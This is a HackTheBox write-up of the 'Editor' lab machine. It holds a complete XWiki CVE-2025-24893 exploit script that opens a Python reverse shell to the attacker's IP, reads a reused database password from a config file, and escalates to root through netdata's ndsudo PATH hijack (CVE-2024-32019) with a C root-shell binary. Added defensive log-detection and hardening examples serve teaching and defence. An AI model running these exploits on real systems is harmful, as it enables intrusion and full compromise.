# Editor (Easy) – HackTheBox Writeup

## Overview

- **Machine name:** Editor
- **Difficulty:** Easy
- **Attack box IP:** `10.10.14.134`
- **Target IP:** `10.10.11.80`

This writeup covers:

1. Enumeration
2. Initial Access (XWiki RCE)
3. User Escalation (SSH)
4. Privilege Escalation (SUID abuse)
5. Flags

---

## 1. Enumeration

### 1.1 Nmap Scan

```bash
sudo nmap -p- --open -sS --min-rate 5000 -n -Pn 10.10.11.80 -vvv
```

Revealed open ports:

```
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
```

### 1.2 Virtual Host Discovery

Mapped `editor.htb` to `10.10.11.80` in `/etc/hosts`, then ran:

```bash
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \
     -H "Host: FUZZ.editor.htb" \
     -u http://editor.htb -v
```

Every candidate that does not match a configured vhost gets the default site back, so once that response size is known, filter it out with `-fs <size>` to leave only real hits.

**Found:** `wiki.editor.htb`

---

## 2. Initial Access: XWiki RCE (CVE-2025-24893)

The subdomain `wiki.editor.htb` ran XWiki. We leveraged the public [CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893) [exploit](https://raw.githubusercontent.com/a1baradi/Exploit/refs/heads/main/CVE-2025-24893.py): an unauthenticated request to the `SolrSearch` RSS endpoint whose `text` parameter escapes the surrounding verbatim block and injects a `{{groovy}}` macro, which the server renders and executes.
### 2.1 Prepare Listener

```bash
nc -lvnp 4444
```

### 2.2 Run Exploit

Using the PoC script (modified for reverse shell):

```python
#!/usr/bin/env python3
import argparse, requests, urllib.parse, sys

def detect_protocol(domain):
    """Pick https or http, whichever answers with a non-error status."""
    for proto in ("https", "http"):
        url = f"{proto}://{domain}"
        try:
            r = requests.get(url, timeout=5)
            if r.status_code < 400:
                return url
        except requests.RequestException:
            pass
    sys.exit("Target unreachable")

def build_payload(lhost, lport):
    """Python reverse shell, with single quotes escaped so it can sit
    inside the single-quoted Groovy string built below."""
    cmd = (
        "python3 -c 'import socket,subprocess,os;"
        f"s=socket.socket();s.connect((\"{lhost}\",{lport}));"
        "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
        "subprocess.call([\"/bin/sh\",\"-i\"])'"
    )
    return cmd.replace("'", "\\'")

def exploit(domain, lhost, lport):
    base = detect_protocol(domain)
    # Groovy one-liner that spawns bash -c <reverse shell>
    groovy = (
        "new ProcessBuilder(['/bin/bash','-c','"
        + build_payload(lhost, lport)
        + "']).redirectErrorStream(true).start()"
    )
    # "}}}" closes the verbatim block the search term is wrapped in;
    # the async macro makes XWiki render the groovy macro in this request
    macro = (
        "}}}{{async async=false}}{{groovy}}"
        + groovy
        + "{{/groovy}}{{/async}}"
    )
    payload = urllib.parse.quote(macro, safe='')
    url = f"{base}/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}"
    print(f"[+] Exploiting → {url}")
    requests.get(url, timeout=10)

if __name__ == "__main__":
    p = argparse.ArgumentParser()
    p.add_argument("domain"); p.add_argument("lhost"); p.add_argument("lport", type=int)
    args = p.parse_args()
    exploit(args.domain, args.lhost, args.lport)
```

Run:

```bash
python3 exploit.py wiki.editor.htb 10.10.14.134 4444
```

### 2.3 Gain Shell

Listener output:

```
connect to [10.10.14.134] from (UNKNOWN) [10.10.11.80] 58790
$
```

Spawn a proper TTY:

```bash
$ python3 -c "import pty; pty.spawn('/bin/bash')"
xwiki@editor:/usr/lib/xwiki-jetty$
```
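From the defender's side, the request above leaves a distinctive trace: a `GET` to `/xwiki/bin/get/Main/SolrSearch` whose `text` parameter carries `}}}` and a `{{groovy}}` macro. The following is an added example, not part of the original writeup or of XWiki, that scans combined-format web server access log lines for that pattern. The log lines are constructed for the demo (the attack line mirrors the URL the exploit script builds, with an `id` payload), and the macro list is an assumption rather than an exhaustive inventory of XWiki script macros.

```python
#!/usr/bin/env python3
"""Flag CVE-2025-24893-style SolrSearch requests in access logs.

Added example (not from the original writeup). Sample log lines are
constructed; DANGEROUS_MACROS is an assumed, non-exhaustive list.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Macros that execute script when rendered (assumed list; async is the
# wrapper the public PoC uses, so it is suspicious in a search term too)
DANGEROUS_MACROS = ("{{groovy", "{{velocity", "{{python", "{{async")

# Constructed sample: one exploit attempt, one benign search, one page view
SAMPLE_LOG = [
    '10.10.14.134 - - [10/Aug/2025:12:01:03 +0000] "GET /xwiki/bin/get/Main/SolrSearch'
    '?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D'
    'new%20ProcessBuilder%28%5B%27id%27%5D%29.start%28%29%7B%7B%2Fgroovy%7D%7D'
    '%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 512',
    '10.10.14.50 - - [10/Aug/2025:12:01:05 +0000] "GET /xwiki/bin/get/Main/SolrSearch'
    '?media=rss&text=installation%20guide HTTP/1.1" 200 2048',
    '10.10.14.50 - - [10/Aug/2025:12:01:07 +0000] "GET /xwiki/bin/view/Main/WebHome'
    ' HTTP/1.1" 200 9001',
]


def is_solr_search_attack(path):
    """Return (flagged, reason) for one request path."""
    parts = urlsplit(path)
    if "/bin/get/Main/SolrSearch" not in parts.path:
        return False, None
    # parse_qs already percent-decodes once; loop to strip double encoding
    text = parse_qs(parts.query).get("text", [""])[0]
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    low = text.lower()
    for macro in DANGEROUS_MACROS:
        if macro in low:
            return True, "macro " + macro + "}} in text parameter"
    if "}}}" in text:  # verbatim-block escape even without a known macro
        return True, "verbatim-block escape '}}}' in text parameter"
    return False, None


def scan_log(lines):
    """Parse log lines and return a list of flagged requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        flagged, reason = is_solr_search_attack(m["path"])
        if flagged:
            hits.append({"ip": m["ip"], "ts": m["ts"],
                         "status": int(m["status"]), "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']}: {hit['reason']}")
```

The decoding loop matters: the exploit percent-encodes the whole macro, and an attacker can encode it twice to slip past a naive substring match on the raw line. A 200 on a flagged request is a strong indicator that the server rendered the payload.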
---

## 3. User Escalation: SSH as `oliver`

### 3.1 Harvest Credentials

Extracted the database password from the XWiki Hibernate config:

```bash
cat /usr/lib/xwiki-jetty/WEB-INF/hibernate.cfg.xml | grep password
```

Noted password: `theEd1t0rTeam99`

Also found a local user in `/etc/passwd`:

```
oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
```

### 3.2 SSH Login

The database password is reused for the local account:

```bash
ssh oliver@editor.htb
# password: theEd1t0rTeam99
```

---

## 4. Privilege Escalation: SUID Netdata Plugin

### 4.1 Identify SUID Binaries

```bash
find / -perm -4000 2>/dev/null
```

Notable SUID:

```
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
```

This matches [CVE-2024-32019](https://nvd.nist.gov/vuln/detail/CVE-2024-32019) ([GHSA-pmhq-4cxq-wj93](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)): `ndsudo` is a setuid-root helper that accepts a fixed set of command keywords (such as `megacli-disk-info`) and locates the underlying binary (`megacli`) by searching the caller's `PATH`. Prepending a user-writable directory to `PATH` therefore makes it execute our binary as root.

### 4.2 Build Malicious Wrapper

On the attack box, create `megacli.c`:

```c
#include <unistd.h>
#include <stdlib.h>

int main(void) {
    /* ndsudo runs us with effective uid 0; make real uid/gid 0 as well
       so the spawned bash does not drop privileges */
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-i", NULL);
    return 0;
}
```

Compile:

```bash
gcc megacli.c -o megacli
```

### 4.3 Host Malicious Binary

```bash
python3 -m http.server 8000
```

On target (SSH session):

```bash
wget http://10.10.14.134:8000/megacli
chmod +x megacli
mkdir ~/fakebin && mv megacli ~/fakebin/
export PATH=~/fakebin:$PATH
```

### 4.4 Exploit ndsudo

```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo megacli-disk-info
```

Yields a root shell:

```bash
root@editor:/home/oliver# id
# uid=0(root) gid=0(root)
```
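The `grep password` step in section 3 also prints any commented-out sample database blocks that a stock `hibernate.cfg.xml` typically carries, so it is easy to copy the wrong value. The following is an added example, not from the writeup or from XWiki, that parses the file as XML and returns only the active `connection.*` properties; the configuration text is a constructed sample in the stock layout, not a copy of the target's file.

```python
#!/usr/bin/env python3
"""Pull live JDBC settings out of an XWiki hibernate.cfg.xml.

Added example (not from the writeup). SAMPLE_CFG is constructed: the
commented-out PostgreSQL block shows why grep alone is unreliable.
"""
import xml.etree.ElementTree as ET

SAMPLE_CFG = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE hibernate-configuration PUBLIC
    "-//Hibernate/Hibernate Configuration DTD 3.0//EN"
    "http://www.hibernate.org/dtd/hibernate-configuration-3.0.dtd">
<hibernate-configuration>
  <session-factory>
    <property name="connection.url">jdbc:mysql://localhost/xwiki</property>
    <property name="connection.username">xwiki</property>
    <property name="connection.password">theEd1t0rTeam99</property>
    <property name="connection.driver_class">com.mysql.cj.jdbc.Driver</property>
    <!--
    <property name="connection.url">jdbc:postgresql://localhost/xwiki</property>
    <property name="connection.username">xwiki</property>
    <property name="connection.password">xwiki</property>
    -->
  </session-factory>
</hibernate-configuration>
"""


def extract_jdbc_settings(xml_text):
    """Return {short_name: value} for every active connection.* property.

    Comments are not elements, so the disabled block is skipped; if the
    file had several <session-factory> elements, later ones would win.
    """
    root = ET.fromstring(xml_text)
    settings = {}
    for prop in root.iter("property"):
        name = prop.get("name", "")
        if name.startswith("connection.") and prop.text is not None:
            settings[name.split(".", 1)[1]] = prop.text.strip()
    return settings


def grep_like(xml_text, needle="password"):
    """What `grep password` shows: every line containing the needle."""
    return [line for line in xml_text.splitlines() if needle in line]


if __name__ == "__main__":
    print("grep would show:", grep_like(SAMPLE_CFG))
    print("active settings:", extract_jdbc_settings(SAMPLE_CFG))
```

On a real box, replace `SAMPLE_CFG` with the contents of `/usr/lib/xwiki-jetty/WEB-INF/hibernate.cfg.xml`; the credentials it yields are then worth trying against SSH and any other service, as the writeup does.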
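To make the root cause of section 4 concrete, here is an added example, not netdata's code, that simulates a setuid helper resolving a command keyword the way the advisory describes, next to a hardened resolver that ignores the caller's `PATH` and insists on a root-owned, non-writable location. The command table and the trusted directory list are assumptions standing in for `ndsudo`'s real ones; the demo recreates the writeup's `~/fakebin` trick in a temporary directory.

```python
#!/usr/bin/env python3
"""ndsudo-style PATH lookup (CVE-2024-32019) versus a hardened lookup.

Added example (not netdata's code). COMMANDS and TRUSTED_DIRS are
assumed stand-ins for the helper's real command table and search path.
"""
import os
import shutil
import stat
import tempfile

# Assumed stand-in for the helper's keyword -> binary table
COMMANDS = {"megacli-disk-info": "megacli", "nvme-list": "nvme"}

# Fixed search path a setuid helper should use instead of the caller's PATH
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")


def resolve_vulnerable(keyword, env):
    """Vulnerable: searches the caller-supplied PATH, so ~/fakebin wins."""
    return shutil.which(COMMANDS[keyword], path=env.get("PATH", ""))


def resolve_hardened(keyword, env):
    """Hardened: ignore env PATH; accept only root-owned, non-writable files."""
    candidate = shutil.which(COMMANDS[keyword], path=os.pathsep.join(TRUSTED_DIRS))
    if candidate is None:
        return None
    st = os.stat(candidate)
    dir_st = os.stat(os.path.dirname(candidate))
    writable = (st.st_mode | dir_st.st_mode) & (stat.S_IWGRP | stat.S_IWOTH)
    if st.st_uid != 0 or dir_st.st_uid != 0 or writable:
        return None
    return candidate


def demo():
    """Plant a fake megacli in a temp dir first in PATH; return both lookups."""
    with tempfile.TemporaryDirectory() as fakebin:
        fake = os.path.join(fakebin, "megacli")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\nexec /bin/sh -i\n")  # stands in for compiled megacli.c
        os.chmod(fake, 0o755)
        env = {"PATH": fakebin + os.pathsep + os.pathsep.join(TRUSTED_DIRS)}
        return {
            "fakebin": fakebin,
            "vulnerable": resolve_vulnerable("megacli-disk-info", env),
            "hardened": resolve_hardened("megacli-disk-info", env),
        }


if __name__ == "__main__":
    result = demo()
    print("vulnerable lookup ->", result["vulnerable"])
    print("hardened lookup   ->", result["hardened"])
```

The vulnerable lookup always returns the planted file; the hardened one returns either a root-owned binary from the fixed directories or `None` when the tool is not installed, which is the correct failure mode for a privileged helper.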